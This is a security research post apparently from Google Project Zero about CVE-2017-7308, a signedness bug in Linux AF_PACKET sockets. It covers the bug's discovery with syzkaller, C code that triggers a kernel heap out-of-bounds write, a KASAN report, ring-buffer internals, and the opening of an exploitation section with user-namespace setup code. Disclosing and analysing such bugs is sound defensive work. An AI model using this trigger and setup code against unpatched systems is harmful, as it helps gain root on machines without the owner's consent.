Google Project Zero


Exploiting the Linux kernel via packet sockets

Wed, 05/10/2017 - 12:33
Guest blog post, posted by Andrey Konovalov

Introduction

Lately I’ve been spending some time fuzzing network-related Linux kernel interfaces with syzkaller. Besides the recently discovered vulnerability in DCCP sockets, I also found another one, this time in packet sockets. This post describes how the bug was discovered and how we can exploit it to escalate privileges.
The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled. As a result the following sanity check in the packet_set_ring() function in net/packet/af_packet.c can be bypassed, which later leads to an out-of-bounds access.
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     (int)(req->tp_block_size -
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
4210                         goto out;
The bug was introduced on Aug 19, 2011 in the commit f6fb8f10 ("af-packet: TPACKET_V3 flexible buffer implementation") together with the TPACKET_V3 implementation. There was an attempt to fix it on Aug 15, 2014 in commit dc808110 ("packet: handle too big packets for PACKET_V3") by adding additional checks, but this was not sufficient, as shown below. The bug was fixed in 2b6867c2 ("net/packet: fix overflow in check for priv area size") on Mar 29, 2017.
The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions. Exploitation requires the CAP_NET_RAW privilege to be able to create such sockets. However, it’s possible to do that from within a user namespace if user namespaces are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.
Since packet sockets are a quite widely used kernel feature, this vulnerability affects a number of popular Linux kernel distributions, including Ubuntu and Android. It should be noted that access to AF_PACKET sockets is expressly disallowed to any untrusted code within Android, although it is available to some privileged components. Updated Ubuntu kernels are already out; Android’s update is scheduled for July.

Syzkaller
The bug was found with syzkaller, a coverage-guided syscall fuzzer, and KASAN, a dynamic memory error detector. I’m going to provide some details on how syzkaller works and how to use it for fuzzing a particular kernel interface, in case someone decides to try this.
Let’s start with a quick overview of how the syzkaller fuzzer works. Syzkaller is able to generate random programs (sequences of syscalls) based on manually written template descriptions for each syscall. The fuzzer executes these programs and collects code coverage for each of them. Using the coverage information, syzkaller keeps a corpus of programs, which trigger different code paths in the kernel. Whenever a new program triggers a new code path (i.e. gives new coverage), syzkaller adds it to the corpus. Besides generating completely new programs, syzkaller is able to mutate the existing ones from the corpus.
Syzkaller is meant to be used together with dynamic bug detectors like KASAN (detects memory bugs like out-of-bounds and use-after-frees, available upstream since 4.0), KMSAN (detects uses of uninitialized memory, prototype was just released) or KTSAN (detects data races, prototype is available). The idea is that syzkaller stresses the kernel and executes various interesting code paths and the detectors detect and report bugs.
The usual workflow for finding bugs with syzkaller is as follows:
  1. Set up syzkaller and make sure it works. The README and wiki provide quite extensive information on how to do that.
  2. Write template descriptions for a particular kernel interface you want to test.
  3. Specify the syscalls that are used in this interface in the syzkaller config.
  4. Run syzkaller until it finds bugs. Usually this happens quite fast for interfaces that haven’t been fuzzed previously.

Syzkaller uses its own declarative language to describe syscall templates. Check out sys/sys.txt for an example or sys/README.md for information on the syntax. Here’s an excerpt from the syzkaller descriptions for AF_PACKET sockets that I used to discover the bug:
resource sock_packet[sock]

define ETH_P_ALL_BE htons(ETH_P_ALL)

socket$packet(domain const[AF_PACKET], type flags[packet_socket_type], proto const[ETH_P_ALL_BE]) sock_packet

packet_socket_type = SOCK_RAW, SOCK_DGRAM

setsockopt$packet_rx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_RX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])
setsockopt$packet_tx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_TX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])

tpacket_req {
	tp_block_size	int32
	tp_block_nr	int32
	tp_frame_size	int32
	tp_frame_nr	int32
}

tpacket_req3 {
	tp_block_size	int32
	tp_block_nr	int32
	tp_frame_size	int32
	tp_frame_nr	int32
	tp_retire_blk_tov	int32
	tp_sizeof_priv	int32
	tp_feature_req_word	int32
}

tpacket_req_u [
	req	tpacket_req
	req3	tpacket_req3
] [varlen]
The syntax is mostly self-explanatory. First, we declare a new type sock_packet. This type is inherited from an existing type sock. That way syzkaller will use syscalls which have arguments of type sock on sock_packet sockets as well.
After that, we declare a new syscall socket$packet. The part before the $ sign tells syzkaller what syscall it should use, and the part after the $ sign is used to differentiate between different kinds of the same syscall. This is particularly useful when dealing with syscalls like ioctl. The socket$packet syscall returns a sock_packet socket.
Then setsockopt$packet_rx_ring and setsockopt$packet_tx_ring are declared. These syscalls set the PACKET_RX_RING and PACKET_TX_RING socket options on a sock_packet socket. I’ll talk about these options in detail below. Both of them use the tpacket_req_u union as a socket option value. This union has two struct members, tpacket_req and tpacket_req3.
Once the descriptions are added, syzkaller can be instructed to fuzz packet-related syscalls specifically. This is what I provided in the syzkaller manager config:
"enable_syscalls": [ "socket$packet", "socketpair$packet", "accept$packet", "accept4$packet", "bind$packet", "connect$packet", "sendto$packet", "recvfrom$packet", "getsockname$packet", "getpeername$packet", "listen", "setsockopt", "getsockopt", "syz_emit_ethernet" ],
After a few minutes of running syzkaller with these descriptions I started getting kernel crashes. Here’s one of the syzkaller programs that triggered the mentioned bug:
mmap(&(0x7f0000000000/0xc8f000)=nil, (0xc8f000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
r0 = socket$packet(0x11, 0x3, 0x300)
setsockopt$packet_int(r0, 0x107, 0xa, &(0x7f000061f000)=0x2, 0x4)
setsockopt$packet_rx_ring(r0, 0x107, 0x5, &(0x7f0000c8b000)=@req3={0x10000, 0x3, 0x10000, 0x3, 0x4, 0xfffffffffffffffe, 0x5}, 0x1c)
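Decoded into plain C, the repro looks roughly like the sketch below (a hedged translation, not the exact executor output: 0x11/0x3/0x300 decode to AF_PACKET/SOCK_RAW/htons(ETH_P_ALL), 0x107 is SOL_PACKET, 0xa is PACKET_VERSION with value 2 = TPACKET_V3, 0x5 is PACKET_RX_RING, and the 64-bit 0xfffffffffffffffe is truncated to the 32-bit 0xfffffffe; the leading mmap is just syzkaller scaffolding):

#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(void) {
	int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

	int version = TPACKET_V3;
	setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));

	struct tpacket_req3 req = {
		.tp_block_size       = 0x10000,
		.tp_block_nr         = 3,
		.tp_frame_size       = 0x10000,
		.tp_frame_nr         = 3,
		.tp_retire_blk_tov   = 4,
		.tp_sizeof_priv      = 0xfffffffe, /* high bit set: triggers the bug */
		.tp_feature_req_word = 5,
	};
	setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
	return 0;
}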
And here’s one of the KASAN reports. It should be noted that, since the access is quite far past the block bounds, the allocation and deallocation stacks don’t correspond to the overflown object.
==================================================================
BUG: KASAN: slab-out-of-bounds in prb_close_block net/packet/af_packet.c:808
Write of size 4 at addr ffff880054b70010 by task syz-executor0/30839

CPU: 0 PID: 30839 Comm: syz-executor0 Not tainted 4.11.0-rc2+ #94
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
Call Trace:
 __dump_stack lib/dump_stack.c:16 [inline]
 dump_stack+0x292/0x398 lib/dump_stack.c:52
 print_address_description+0x73/0x280 mm/kasan/report.c:246
 kasan_report_error mm/kasan/report.c:345 [inline]
 kasan_report.part.3+0x21f/0x310 mm/kasan/report.c:368
 kasan_report mm/kasan/report.c:393 [inline]
 __asan_report_store4_noabort+0x2c/0x30 mm/kasan/report.c:393
 prb_close_block net/packet/af_packet.c:808 [inline]
 prb_retire_current_block+0x6ed/0x820 net/packet/af_packet.c:970
 __packet_lookup_frame_in_block net/packet/af_packet.c:1093 [inline]
 packet_current_rx_frame net/packet/af_packet.c:1122 [inline]
 tpacket_rcv+0x9c1/0x3750 net/packet/af_packet.c:2236
 packet_rcv_fanout+0x527/0x810 net/packet/af_packet.c:1493
 deliver_skb net/core/dev.c:1834 [inline]
 __netif_receive_skb_core+0x1cff/0x3400 net/core/dev.c:4117
 __netif_receive_skb+0x2a/0x170 net/core/dev.c:4244
 netif_receive_skb_internal+0x1d6/0x430 net/core/dev.c:4272
 netif_receive_skb+0xae/0x3b0 net/core/dev.c:4296
 tun_rx_batched.isra.39+0x5e5/0x8c0 drivers/net/tun.c:1155
 tun_get_user+0x100d/0x2e20 drivers/net/tun.c:1327
 tun_chr_write_iter+0xd8/0x190 drivers/net/tun.c:1353
 call_write_iter include/linux/fs.h:1733 [inline]
 new_sync_write fs/read_write.c:497 [inline]
 __vfs_write+0x483/0x760 fs/read_write.c:510
 vfs_write+0x187/0x530 fs/read_write.c:558
 SYSC_write fs/read_write.c:605 [inline]
 SyS_write+0xfb/0x230 fs/read_write.c:597
 entry_SYSCALL_64_fastpath+0x1f/0xc2
RIP: 0033:0x40b031
RSP: 002b:00007faacbc3cb50 EFLAGS: 00000293 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 000000000000002a RCX: 000000000040b031
RDX: 000000000000002a RSI: 0000000020002fd6 RDI: 0000000000000015
RBP: 00000000006e2960 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000708000
R13: 000000000000002a R14: 0000000020002fd6 R15: 0000000000000000

Allocated by task 30534:
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525 [inline]
 kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617
 kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:555
 slab_post_alloc_hook mm/slab.h:456 [inline]
 slab_alloc_node mm/slub.c:2720 [inline]
 slab_alloc mm/slub.c:2728 [inline]
 kmem_cache_alloc+0x1af/0x250 mm/slub.c:2733
 getname_flags+0xcb/0x580 fs/namei.c:137
 getname+0x19/0x20 fs/namei.c:208
 do_sys_open+0x2ff/0x720 fs/open.c:1045
 SYSC_open fs/open.c:1069 [inline]
 SyS_open+0x2d/0x40 fs/open.c:1064
 entry_SYSCALL_64_fastpath+0x1f/0xc2

Freed by task 30534:
 save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59
 save_stack+0x43/0xd0 mm/kasan/kasan.c:513
 set_track mm/kasan/kasan.c:525 [inline]
 kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590
 slab_free_hook mm/slub.c:1358 [inline]
 slab_free_freelist_hook mm/slub.c:1381 [inline]
 slab_free mm/slub.c:2963 [inline]
 kmem_cache_free+0xb5/0x2d0 mm/slub.c:2985
 putname+0xee/0x130 fs/namei.c:257
 do_sys_open+0x336/0x720 fs/open.c:1060
 SYSC_open fs/open.c:1069 [inline]
 SyS_open+0x2d/0x40 fs/open.c:1064
 entry_SYSCALL_64_fastpath+0x1f/0xc2

Object at ffff880054b70040 belongs to cache names_cache of size 4096
The buggy address belongs to the page:
page:ffffea000152dc00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0
flags: 0x500000000008100(slab|head)
raw: 0500000000008100 0000000000000000 0000000000000000 0000000100070007
raw: ffffea0001549a20 ffffea0001b3cc20 ffff88003eb44f40 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff880054b6ff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 ffff880054b6ff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff880054b70000: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
                         ^
 ffff880054b70080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff880054b70100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
You can find more details about syzkaller in its repository and more details about KASAN in the kernel documentation. If you decide to try syzkaller or KASAN and run into any trouble, drop an email to syzkaller@googlegroups.com or to kasan-dev@googlegroups.com.

Introduction to AF_PACKET sockets
To better understand the bug, the vulnerability it leads to and how to exploit it, we need to understand what AF_PACKET sockets are and how they are implemented in the kernel.
Overview
AF_PACKET sockets allow users to send or receive packets at the device driver level. This, for example, lets them implement their own protocol on top of the physical layer or sniff packets including Ethernet and higher-level protocol headers. To create an AF_PACKET socket a process must have the CAP_NET_RAW capability in the user namespace that governs its network namespace. More details can be found in the packet sockets documentation. It should be noted that if a kernel has unprivileged user namespaces enabled, then an unprivileged user is able to create packet sockets.
To send and receive packets on a packet socket, a process can use the send and recv syscalls. However, packet sockets provide a faster way to do this via a ring buffer that’s shared between the kernel and userspace. A ring buffer can be created via the PACKET_TX_RING and PACKET_RX_RING socket options. The ring buffer can then be mmapped by the user, and the packet data can be read from or written to it directly.
The kernel supports a few different variants of ring buffer handling; the user chooses between them with the PACKET_VERSION socket option. The differences between ring buffer versions can be found in the kernel documentation (search for “TPACKET versions”).
One of the widely known users of AF_PACKET sockets is the tcpdump utility. This is roughly what happens when tcpdump is used to sniff all packets on a particular interface:
# strace tcpdump -i eth0
...
socket(PF_PACKET, SOCK_RAW, 768)        = 3
...
bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0
...
setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0
...
setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0
...
mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000
...
This sequence of syscalls corresponds to the following actions:
  1. A socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) is created.
  2. The socket is bound to the eth0 interface.
  3. Ring buffer version is set to TPACKET_V2 via the PACKET_VERSION socket option.
  4. A ring buffer is created via the PACKET_RX_RING socket option.
  5. The ring buffer is mmapped in the userspace.

After that the kernel will start putting all packets coming through the eth0 interface in the ring buffer and tcpdump will read them from the mmapped region in the userspace.


Ring buffers
Let’s see how to use ring buffers for packet sockets. For consistency all of the kernel code snippets below will come from the Linux kernel 4.8. This is the version the latest Ubuntu 16.04.2 kernel is based on.
The existing documentation mostly focuses on TPACKET_V1 and TPACKET_V2 ring buffer versions. Since the mentioned bug only affects the TPACKET_V3 version, I’m going to assume that we deal with that particular version for the rest of the post. Also I’m going to mostly focus on PACKET_RX_RING ignoring PACKET_TX_RING.
A ring buffer is a memory region used to store packets. Each packet is stored in a separate frame. Frames are grouped into blocks. In TPACKET_V3 ring buffers the frame size is not fixed and can have an arbitrary value as long as a frame fits into a block.
To create a TPACKET_V3 ring buffer via the PACKET_RX_RING socket option a user must provide the exact parameters for the ring buffer. These parameters are passed to the setsockopt call via a pointer to a request struct called tpacket_req3, which is defined as:
274 struct tpacket_req3 {
275         unsigned int    tp_block_size;  /* Minimal size of contiguous block */
276         unsigned int    tp_block_nr;    /* Number of blocks */
277         unsigned int    tp_frame_size;  /* Size of frame */
278         unsigned int    tp_frame_nr;    /* Total number of frames */
279         unsigned int    tp_retire_blk_tov; /* timeout in msecs */
280         unsigned int    tp_sizeof_priv; /* offset to private data area */
281         unsigned int    tp_feature_req_word;
282 };
Here’s what each field means in the tpacket_req3 struct:
  1. tp_block_size - the size of each block.
  2. tp_block_nr - the number of blocks.
  3. tp_frame_size - the size of each frame, ignored for TPACKET_V3.
  4. tp_frame_nr - the number of frames, ignored for TPACKET_V3.
  5. tp_retire_blk_tov - timeout after which a block is retired, even if it’s not fully filled with data (see below).
  6. tp_sizeof_priv - the size of per-block private area. This area can be used by a user to store arbitrary information associated with each block.
  7. tp_feature_req_word - a set of flags (actually just one at the moment) which allows enabling some additional functionality.

Each block has an associated header, which is stored at the very beginning of the memory area allocated for the block. The block header struct is called tpacket_block_desc and has a block_status field, which indicates whether the block is currently being used by the kernel or available to the user. The usual workflow is that the kernel stores packets into a block until it’s full and then sets block_status to TP_STATUS_USER. The user then reads required data from the block and releases it back to the kernel by setting block_status to TP_STATUS_KERNEL.
186 struct tpacket_hdr_v1 {
187         __u32   block_status;
188         __u32   num_pkts;
189         __u32   offset_to_first_pkt;
...
233 };
234 
235 union tpacket_bd_header_u {
236         struct tpacket_hdr_v1 bh1;
237 };
238 
239 struct tpacket_block_desc {
240         __u32 version;
241         __u32 offset_to_priv;
242         union tpacket_bd_header_u hdr;
243 };
Each frame also has an associated header described by the struct tpacket3_hdr. The tp_next_offset field points to the next frame within the same block.
162 struct tpacket3_hdr {
163         __u32 tp_next_offset;
...
176 };
When a block is fully filled with data (a new packet doesn’t fit into the remaining space), it’s closed and released to userspace, or “retired”, by the kernel. Since the user usually wants to see packets as soon as possible, the kernel can release a block even if it’s not filled with data completely. This is done by setting up a timer that retires the current block after a timeout controlled by the tp_retire_blk_tov parameter.
There’s also a way to specify a per-block private area, which the kernel won’t touch and which the user can use to store any information associated with a block. The size of this area is passed via the tp_sizeof_priv parameter.
If you’d like to better understand how a userspace program can use a TPACKET_V3 ring buffer, you can read the example provided in the documentation (search for “TPACKET_V3 example“). A condensed sketch of the same flow is shown below.
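Here is a minimal sketch of the receive flow described above (condensed from the documented example; the parameter values are arbitrary and error handling is omitted):

#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <poll.h>

int main(void) {
	int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

	int version = TPACKET_V3;
	setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));

	struct tpacket_req3 req = {
		.tp_block_size     = 1 << 17,              /* must be page-aligned */
		.tp_block_nr       = 8,
		.tp_frame_size     = 1 << 11,              /* ignored for TPACKET_V3 */
		.tp_frame_nr       = ((1 << 17) / (1 << 11)) * 8,
		.tp_retire_blk_tov = 60,                   /* retire blocks after 60 ms */
		.tp_sizeof_priv    = 0,
	};
	setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));

	char *ring = mmap(NULL, (size_t)req.tp_block_size * req.tp_block_nr,
			  PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

	/* Wait until the kernel hands us the first block, then release it. */
	struct pollfd pfd = { .fd = fd, .events = POLLIN };
	poll(&pfd, 1, -1);

	struct tpacket_block_desc *pbd = (struct tpacket_block_desc *)ring;
	if (pbd->hdr.bh1.block_status & TP_STATUS_USER) {
		/* Frames start at hdr.bh1.offset_to_first_pkt and are chained
		   via tpacket3_hdr.tp_next_offset; walk them here. */
		pbd->hdr.bh1.block_status = TP_STATUS_KERNEL;
	}
	return 0;
}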

Implementation of AF_PACKET sockets
Let’s take a quick look at how some of this is implemented in the kernel.
Struct definitions
Whenever a packet socket is created, an associated packet_sock struct is allocated in the kernel:
103 struct packet_sock {
...
105         struct sock             sk;
...
108         struct packet_ring_buffer       rx_ring;
109         struct packet_ring_buffer       tx_ring;
...
123         enum tpacket_versions   tp_version;
...
130         int                     (*xmit)(struct sk_buff *skb);
...
132 };
The tp_version field in this struct holds the ring buffer version, which in our case is set to TPACKET_V3 by a PACKET_VERSION setsockopt call. The rx_ring and tx_ring fields describe the receive and transmit ring buffers in case they are created via PACKET_RX_RING and PACKET_TX_RING setsockopt calls. These two fields have type packet_ring_buffer, which is defined as:
56 struct packet_ring_buffer {
57         struct pgv              *pg_vec;
...
70         struct tpacket_kbdq_core        prb_bdqc;
71 };
The pg_vec field is a pointer to an array of pgv structs, each of which holds a reference to a block. Blocks are actually allocated separately, not as one contiguous memory region.
52 struct pgv {
53         char *buffer;
54 };


The prb_bdqc field is of type tpacket_kbdq_core and its fields describe the current state of the ring buffer:
14 struct tpacket_kbdq_core {
...
21         unsigned short  blk_sizeof_priv;
...
36         char            *nxt_offset;
...
49         struct timer_list retire_blk_timer;
50 };
The blk_sizeof_priv field contains the size of the per-block private area. The nxt_offset field points inside the currently active block and shows where the next packet should be saved. The retire_blk_timer field has type timer_list and describes the timer which retires the current block on timeout.
12 struct timer_list {
...
17         struct hlist_node       entry;
18         unsigned long           expires;
19         void                    (*function)(unsigned long);
20         unsigned long           data;
...
31 };
Ring buffer setup
The kernel uses the packet_setsockopt() function to handle setting socket options for packet sockets. When the PACKET_VERSION socket option is used, the kernel sets po->tp_version to the provided value.
With the PACKET_RX_RING socket option a receive ring buffer is created. Internally it’s done by the packet_set_ring() function. This function does a lot of things, so I’ll just show the important parts. First, packet_set_ring() performs a bunch of sanity checks on the provided ring buffer parameters:
4202                 err = -EINVAL;
4203                 if (unlikely((int)req->tp_block_size <= 0))
4204                         goto out;
4205                 if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
4206                         goto out;
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     (int)(req->tp_block_size -
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
4210                         goto out;
4211                 if (unlikely(req->tp_frame_size < po->tp_hdrlen +
4212                                         po->tp_reserve))
4213                         goto out;
4214                 if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
4215                         goto out;
4216 
4217                 rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
4218                 if (unlikely(rb->frames_per_block == 0))
4219                         goto out;
4220                 if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
4221                                         req->tp_frame_nr))
4222                         goto out;
Then, it allocates the ring buffer blocks:
4224                 err = -ENOMEM;
4225                 order = get_order(req->tp_block_size);
4226                 pg_vec = alloc_pg_vec(req, order);
4227                 if (unlikely(!pg_vec))
4228                         goto out;
It should be noted that alloc_pg_vec() uses the kernel page allocator to allocate blocks (we’ll use this in the exploit):
4104 static char *alloc_one_pg_vec_page(unsigned long order)
4105 {
...
4110         buffer = (char *) __get_free_pages(gfp_flags, order);
4111         if (buffer)
4112                 return buffer;
...
4127 }
4128 
4129 static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
4130 {
...
4139         for (i = 0; i < block_nr; i++) {
4140                 pg_vec[i].buffer = alloc_one_pg_vec_page(order);
...
4143         }
...
4152 }
Finally, packet_set_ring() calls init_prb_bdqc(), which performs some additional steps to set up a TPACKET_V3 receive ring buffer specifically:
4229                 switch (po->tp_version) {
4230                 case TPACKET_V3:
...
4234                         if (!tx_ring)
4235                                 init_prb_bdqc(po, rb, pg_vec, req_u);
4236                         break;
4237                 default:
4238                         break;
4239                 }
The init_prb_bdqc() function copies provided ring buffer parameters to the prb_bdqc field of the ring buffer struct, calculates some other parameters based on them, sets up the block retire timer and calls prb_open_block() to initialize the first block:
604 static void init_prb_bdqc(struct packet_sock *po,
605                         struct packet_ring_buffer *rb,
606                         struct pgv *pg_vec,
607                         union tpacket_req_u *req_u)
608 {
609         struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
610         struct tpacket_block_desc *pbd;
...
616         pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
617         p1->pkblk_start = pg_vec[0].buffer;
618         p1->kblk_size = req_u->req3.tp_block_size;
...
630         p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
631 
632         p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
633         prb_init_ft_ops(p1, req_u);
634         prb_setup_retire_blk_timer(po);
635         prb_open_block(p1, pbd);
636 }
One of the things the prb_open_block() function does is set the nxt_offset field of the tpacket_kbdq_core struct to point right after the per-block private area:
841 static void prb_open_block(struct tpacket_kbdq_core *pkc1,
842         struct tpacket_block_desc *pbd1)
843 {
...
862         pkc1->pkblk_start = (char *)pbd1;
863         pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
...
876 }
Packet reception
Whenever a new packet is received, the kernel is supposed to save it into the ring buffer. The key function here is __packet_lookup_frame_in_block(), which does the following:
  1. Checks whether the currently active block has enough space for the packet.
  2. If yes, saves the packet to the current block and returns.
  3. If no, dispatches the next block and saves the packet there.

1041 static void *__packet_lookup_frame_in_block(struct packet_sock *po,
1042                                             struct sk_buff *skb,
1043                                                 int status,
1044                                             unsigned int len
1045                                             )
1046 {
1047         struct tpacket_kbdq_core *pkc;
1048         struct tpacket_block_desc *pbd;
1049         char *curr, *end;
1050 
1051         pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
1052         pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
...
1075         curr = pkc->nxt_offset;
1076         pkc->skb = skb;
1077         end = (char *)pbd + pkc->kblk_size;
1078 
1079         /* first try the current block */
1080         if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
1081                 prb_fill_curr_block(curr, pkc, pbd, len);
1082                 return (void *)curr;
1083         }
1084 
1085         /* Ok, close the current block */
1086         prb_retire_current_block(pkc, po, 0);
1087 
1088         /* Now, try to dispatch the next block */
1089         curr = (char *)prb_dispatch_next_block(pkc, po);
1090         if (curr) {
1091                 pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
1092                 prb_fill_curr_block(curr, pkc, pbd, len);
1093                 return (void *)curr;
1094         }
...
1101 }

Vulnerability
Bug
Let’s look closely at the following check from packet_set_ring():
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     (int)(req->tp_block_size -
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
4210                         goto out;
This is supposed to ensure that the length of the block header together with the per-block private data is not bigger than the size of the block, which totally makes sense: otherwise there wouldn’t be enough space in the block for them, let alone the packet data.
However, it turns out this check can be bypassed. If req_u->req3.tp_sizeof_priv has its high bit set, casting the expression to int results in a big positive value instead of a negative one. To illustrate this behavior:
A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0
Later, when req_u->req3.tp_sizeof_priv is copied to p1->blk_sizeof_priv in init_prb_bdqc() (see the snippet above), it’s truncated to its two lower bytes, since the type of the latter is unsigned short. So this bug basically allows us to set blk_sizeof_priv of the tpacket_kbdq_core struct to an arbitrary value, bypassing all sanity checks.
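A small stand-alone program demonstrating both the signedness bypass and the unsigned short truncation (assuming BLK_HDR_LEN = 48 and V3_ALIGNMENT = 8, the values used in the arithmetic above):

#include <stdio.h>

#define V3_ALIGNMENT   8
#define BLK_HDR_LEN    48  /* aligned sizeof(struct tpacket_block_desc) */
#define ALIGN(x, a)    (((x) + (a) - 1) & ~((a) - 1))
#define BLK_PLUS_PRIV(sz) (BLK_HDR_LEN + ALIGN((sz), V3_ALIGNMENT))

int main(void) {
	unsigned int tp_block_size = 0x1000;
	unsigned int tp_sizeof_priv = (1u << 31) + 0x1000;

	/* The kernel's check: prints 2147483600 (0x7fffffd0), a big
	   positive value, so the bypass succeeds. */
	printf("%d\n", (int)(tp_block_size - BLK_PLUS_PRIV(tp_sizeof_priv)));

	/* What ends up in blk_sizeof_priv (an unsigned short): 0x1000. */
	printf("0x%x\n", (unsigned short)tp_sizeof_priv);
	return 0;
}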
Consequences
If we search through the net/packet/af_packet.c source looking for blk_sizeof_priv usage, we’ll find that it’s used in the following two places.
The first one is in init_prb_bdqc() right after it gets assigned (see the code snippet above) to set max_frame_len. The value of p1->max_frame_len denotes the maximum size of a frame that can be saved into a block. Since we control p1->blk_sizeof_priv, we can make BLK_PLUS_PRIV(p1->blk_sizeof_priv) bigger than p1->kblk_size. This will result in p1->max_frame_len having a huge value, higher than the size of a block. This allows us to bypass the size check when a frame is being copied into a block, thus causing a kernel heap out-of-bounds write.
That’s not all. Another user of blk_sizeof_priv is prb_open_block(), which initializes a block (the code snippet is above as well). There pkc1->nxt_offset denotes the address where the kernel will write a new packet when it’s received. The kernel doesn’t intend to overwrite the block header and per-block private data, so it makes this address point right after them. Since we control blk_sizeof_priv, we can control the lowest two bytes of nxt_offset. This allows us to control the offset of the out-of-bounds write.
To sum up, this bug leads to a kernel heap out-of-bounds write of controlled maximum size at a controlled offset of up to about 64k bytes.

Exploitation
Let’s see how we can exploit this vulnerability. I’m going to be targeting x86-64 Ubuntu 16.04.2 with the 4.8.0-41-generic kernel, with KASLR, SMEP and SMAP enabled. The Ubuntu kernel has user namespaces available to unprivileged users (CONFIG_USER_NS=y and no restrictions on its usage), so the bug can be exploited to gain root privileges by an unprivileged user. All of the exploitation steps below are performed from within a user namespace.
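For reference, the usual way to get CAP_NET_RAW as an unprivileged user is to enter fresh user and network namespaces. A minimal sketch of the standard unshare/uid_map flow (error handling omitted):

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

static void write_file(const char *path, const char *buf) {
	int fd = open(path, O_WRONLY);
	write(fd, buf, strlen(buf));
	close(fd);
}

void setup_sandbox(void) {
	uid_t uid = getuid();
	gid_t gid = getgid();
	char buf[64];

	unshare(CLONE_NEWUSER | CLONE_NEWNET);

	/* Map ourselves to root inside the new user namespace. */
	write_file("/proc/self/setgroups", "deny");
	snprintf(buf, sizeof(buf), "0 %d 1", uid);
	write_file("/proc/self/uid_map", buf);
	snprintf(buf, sizeof(buf), "0 %d 1", gid);
	write_file("/proc/self/gid_map", buf);
}

Note that a fresh network namespace starts with the loopback interface down, so an exploit also has to bring lo up before it can send packets through it.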
